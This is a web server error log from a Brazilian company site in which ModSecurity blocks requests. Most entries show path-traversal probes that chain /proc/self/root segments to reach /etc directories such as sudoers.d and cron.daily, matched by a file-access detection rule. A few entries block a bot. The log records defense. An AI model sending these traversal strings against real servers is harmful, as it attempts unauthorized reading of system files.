[Wed Mar 18 07:25:36.535347 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:45242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9oNY0UrI5A3LftIx3FAAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:25:37.931428 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:42446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9ocdf6f5d65gmYZSuNAAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:25:46.679173 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:48078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9qta6ubjKNq_cu4Zx0AAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:25:49.345565 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:42172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9rcdf6f5d65gmYZSuSAAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:25:56.291342 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:56482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9tOyqAr6etmhZHNqXMAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:25:58.755727 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:56490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9tgkwaGbbGflqUZDrxwAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:26:16.039175 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:42454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9yNY0UrI5A3LftIx3dgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:26:22.726929 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:41248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9zuoXxyEfFpUF8f9IoQAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:26:32.410869 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:60338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp92NY0UrI5A3LftIx3nQAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:27:05.650935 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:44432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9-ew_le52K8_3pV26kgAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:27:09.226001 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:56022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9_cdf6f5d65gmYZSumAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:27:10.779035 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:43574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9_tY0UrI5A3LftIx34wAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:27:20.423308 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:43580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-COyqAr6etmhZHNqXhgAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:27:25.575362 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:37774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-DdY0UrI5A3LftIx4BQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:27:42.403463 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.228.61:46188] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp-Hda6ubjKNq_cu4ZyZQAAA0w"]
[Wed Mar 18 07:27:50.867271 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.244.43:37342] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp-Jsdf6f5d65gmYZSuzgAAAtM"]
[Wed Mar 18 07:27:54.115297 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:43326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-Kfu8EFLIOrSqIpvgoAAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:27:59.378444 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:55216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-L-yqAr6etmhZHNqXtQAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:28:04.750323 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:37778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-NMdf6f5d65gmYZSu5AAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:28:10.361553 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:33506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-OgkwaGbbGflqUZDsPQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:28:17.247187 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:34374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-Qew_le52K8_3pV26xgAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:28:37.259717 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:41700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-Vcdf6f5d65gmYZSvAgAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:28:45.708012 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:38718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-Xcdf6f5d65gmYZSvDAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:28:55.751304 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:34382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-Z_u8EFLIOrSqIpvg5gAAAkc"], referer: 